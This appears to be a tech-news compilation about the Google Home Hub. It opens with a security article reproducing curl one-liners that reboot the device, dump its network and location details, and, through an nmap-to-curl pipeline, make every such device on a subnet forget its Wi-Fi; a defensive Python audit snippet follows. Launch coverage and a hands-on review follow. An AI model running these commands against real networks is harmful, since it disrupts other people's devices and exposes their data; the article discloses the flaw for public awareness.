The Google Home Hub is deeply insecure

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and allows you to see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its PIN), and accepts commands remotely (including a quick reboot via the command line).

The command – which consists of a simple URL call via the command line – is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

Other one-liners expose further data, including a number of microservices:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
  "bssid": "cc:be:59:8c:11:8b",
  "build_version": "136769",
  "cast_build_revision": "1.35.136769",
  "closed_caption": {},
  "connected": true,
  "ethernet_connected": false,
  "has_update": false,
  "hotspot_bssid": "FA:8F:CA:9C:AA:11",
  "ip_address": "192.168.1.1",
  "locale": "en-US",
  "location": {
    "country_code": "US",
    "latitude": 255,
    "longitude": 255
  },
  "mac_address": "11:A1:1A:11:AA:11",
  "name": "Hub Display",
  "noise_level": -94,
  "opencast_pin_code": "1111",
  "opt_in": {
    "crash": true,
    "opencast": true,
    "stats": true
  },
  "public_key": "Removed",
  "release_track": "stable-channel",
  "setup_state": 60,
  "setup_stats": {
    "historically_succeeded": true,
    "num_check_connectivity": 0,
    "num_connect_wifi": 0,
    "num_connected_wifi_not_saved": 0,
    "num_initial_eureka_info": 0,
    "num_obtain_ip": 0
  },
  "signal_level": -60,
  "ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
  "ssid": "SSID",
  "time_format": 2,
  "timezone": "America/Chicago",
  "tos_accepted": true,
  "uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
  "uptime": 25244.52,
  "version": 9,
  "wpa_configured": true,
  "wpa_id": 0,
  "wpa_state": 10
}
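
To see what an unauthenticated caller learns from that response, the following added example (not from Gamblin's post or from Google) sorts the fields of a saved eureka_info reply into exposure categories. The category names, the function names and the rule that out-of-range coordinates mean "unset" are assumptions of this example; the sample input is a constructed subset of the output above.

```python
import json

# Assumed grouping (this example's own) of fields seen in the response above.
SENSITIVE = {
    "bssid": "network identity",
    "hotspot_bssid": "network identity",
    "ssid": "network identity",
    "ip_address": "network identity",
    "mac_address": "device identity",
    "name": "device identity",
    "ssdp_udn": "device identity",
    "uma_client_id": "device identity",
    "opencast_pin_code": "pairing secret",
    "location.country_code": "physical location",
    "location.latitude": "physical location",
    "location.longitude": "physical location",
    "timezone": "physical location",
}

def flatten(obj, prefix=""):
    """Yield (dotted_path, value) for every leaf of a nested JSON object."""
    for key, value in obj.items():
        if isinstance(value, dict):
            yield from flatten(value, f"{prefix}{key}.")
        else:
            yield f"{prefix}{key}", value

def is_populated(path, value):
    """Skip empty values and coordinates outside the valid range (assumed unset)."""
    if value in ("", None):
        return False
    if path.endswith("latitude"):
        return -90 <= value <= 90
    if path.endswith("longitude"):
        return -180 <= value <= 180
    return True

def audit_eureka_info(raw_json):
    """Return {category: [field paths]} readable without authentication."""
    findings = {}
    for path, value in flatten(json.loads(raw_json)):
        category = SENSITIVE.get(path)
        if category and is_populated(path, value):
            findings.setdefault(category, []).append(path)
    return findings

# Constructed sample: a subset of the response shown above.
SAMPLE = """{"bssid": "cc:be:59:8c:11:8b", "closed_caption": {},
 "location": {"country_code": "US", "latitude": 255, "longitude": 255},
 "mac_address": "11:A1:1A:11:AA:11", "name": "Hub Display",
 "opencast_pin_code": "1111", "ssid": "SSID",
 "timezone": "America/Chicago", "version": 9}"""
```

Calling audit_eureka_info(SAMPLE) groups the network identifiers, the device identifiers, the cast PIN and the coarse location separately, which makes it easy to compare what different devices or firmware versions disclose.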

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process.

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.

Google Home Hub up close and hands on

While the rumors and leaks didn’t leave much to the imagination ahead of today’s event, I will admit to being a bit surprised by the shape Google’s Home Hub actually took. The renders didn’t do justice to the actual product.

For starters, the seven-inch screen splits the difference between the Echo Show and Spot in an interesting way. It’s not a compact device, per se, but it’s a lot smaller than I’d initially expected, and as such, it should fit in a lot more spots at home than the larger Show.

From a design standpoint, the product is best described as a seven-inch tablet resting atop a speaker at roughly a 25 to 30 degree angle. The idea is to give you a screen you can view from the other side of the room. After all, this is a voice-first product. While it does have touch functionality enabled, that’s primarily secondary. As such there are certain things you can’t do here like, say, pinch to zoom.

That’s largely a moot point here, given the fact that the product doesn’t have, say, a standard web browser, unlike the new Show. Of course, part of the reason Amazon offers a browser on its own devices is so you can access YouTube. That’s obviously not a problem on a product that very much has native YouTube support.

The other thing the peculiar design affords the product is multi-directional sound. Like the Show, the bulk of the fabric-covered speaker faces back, toward the wall. There is, however, an exposed sliver on the bottom, which sends some of that sound toward you.

The sound is decent for a product of this size, but again, I wouldn’t rely on it as any sort of home entertainment system. If you’ve got multiple Home devices at home, however, you can tell Assistant, “extend to my Home Mini,” etc, and the music will follow you into the other room.

Google also notes that this isn’t really an entertainment consuming machine. The Home Hub isn’t designed for watching movies or even TV shows. Rather, if anything, it’s kind of a YouTube delivery device, in much the same way that the Portal is a real world manifestation of Facebook’s video chat. Of course, right out of the gate, this product is going to offer a much fuller experience than Portal — Facebook, after all, is still kind of testing the water to see what users want out of their devices.

That said, Google tells me that the company is still assessing whether users are interested in smart home hub functionality via something like Z-Wave. It’s a bit of a glaring omission here, based on both the added focus on connected home features and the fact that the damn thing has hub in its name. That said, Google seems to prefer building that kind of syncing in via Bluetooth, much like it did with those newly announced GE lights.

The Hub does fall under Google’s “Smart Display” category, meaning it’s a direct competitor with products from Lenovo, JBL and LG. The company tells me that there was a gap in announcements simply because it took the company longer to build the product from the ground up. The Hub wasn’t built via a hardware partner, but rather from the ground up.

One of the upsides there is pricing. $149 certainly makes this a competitive offering versus the Show and Portal.

more Google Event 2018 coverage

Google’s Home Hub has a screen but no camera ‘so that it is comfortable in private spaces’

Is Google finally taking consumers’ privacy concerns to heart? Today, the search and Android giant took the wraps off its $149 Home Hub, a new screen-based smart home device that lets you interact with Google services like Google Photos and connected smart home devices. It’s Google’s answer to the Amazon Echo Show and Facebook’s new Portal. But in this age of privacy, the company made an interesting feature choice: it will be shipping the first version of the device without a camera built in.

“We also consciously did not put a camera on so that it was comfortable to us in the private spaces of your home like your bedroom,” noted Diya Jolly, VP of product management in the presentation today, while going through other features on the device.

The feature — or lack thereof, as the case may be — is notable. Just yesterday, Facebook unveiled its own connected home screen device, the Portal, and Amazon has been working hard to push and update its Echo Show, its Alexa-powered home hub with a screen. Both Amazon and Facebook are focused not just on how to show images, but how to capture them and to use visual cues to build more intelligent services.

Google, it would seem, is taking a different approach: tech companies have been under the spotlight for how they are handling privacy these days, and Google’s decision to leave a camera out of this device plays into the idea of how tech companies are trying to be more sensitive to what users want — and maybe need, since we already have so many other devices with cameras on them.

For Google specifically, the timing is especially important: just this week the company announced that it would be shutting down Google+, its ill-fated social network that had a bug in it that exposed the private information of users. The optics — pun intended — of pushing out a new device with a camera on it, at a time when many wonder just how much information these smart home speakers are picking up, would look very bad indeed.

On the other hand, leaving a camera out could serve other ends for Google.

It helps it keep the cost of the device down, with $149 a very competitive price point.

It also could help Google keep this device from competing with others that it is pushing to users — specifically its phones, its new Pixel Slate tablet, which has a front-facing camera for video chat; and the Pixel Stand, which — when combined with the new Pixel 3 smartphone — essentially turns that device into a screen-based home hub that does have a camera.

Lastly, it helps Google start to build a roadmap for features that it could add into the main Home Hub product in later iterations, if it finds that users are requesting it.

Here’s Google’s Echo Show competitor, the Home Hub

This is Google’s Echo Show competitor, the Home Hub. We knew it was coming, via an avalanche of leaks and now, moments before the event has officially kicked off, here it is in all of its glory by way of the full leaked product video (again spotted by 9 to 5 Google). The product is a looker — especially compared to the last two generations of Amazon’s Echo Show.

Moments later, the head of hardware at Google, Rick Osterloh, made the device official at an event in New York City.

The device looks like an Android tablet mounted on top of a speaker — which ought to address the backward firing sound, which is one of the largest design flaws of the recently introduced Echo Show 2. The speaker fabric comes in a number of different colors, in keeping with the rest of the Pixel/Home products, including the new Aqua.

Google says the product was also purposefully made smaller in order to better fit in the home. Size-wise, the device seems to split the difference between the Show and Spot. The product also features ambient light and white balance sensors to adjust to its environment. It will also shut the display off at night, when it’s time to go to bed.

The device joins a trio of “Smart Displays” for Google Assistant built by JBL, Lenovo and LG. Design-wise Lenovo’s was the best of the bunch, but the Home Hub looks to have outclassed it. The functions are pretty much what you’d expect from these devices, including traffic, weather and cooking. The Hub features a number of recipes built in, offering you step by step directions, along with quick videos showing you how to execute different actions like poaching eggs.

Of course, Google’s got one key, not so secret weapon against Amazon: YouTube. Unlike Amazon, which relies on a browser-based workaround, the Hub plays videos automatically from Google’s service. That also goes for YouTube Music, making the device the first killer platform for the service, playing music and showing videos. Fittingly, the device will ship with six free months of YouTube Premium.

Google has also clearly made fitness a key piece here, showing off some yoga classes on the product, along with a touchscreen smart home control center. “It truly is the hub for a thoughtful home,” the company said during the event. Home View is the name of the device’s dashboard, which allows you to view different smart home products by different rooms.

It’s essentially a one stop shop for Nest and various other smart home products. It looks to be leaps and bounds beyond what Amazon currently offers with the Echo Show. Naturally, the product will also bring video from Nest cameras to the product. The list of compatible products includes devices from Dish and Philips.
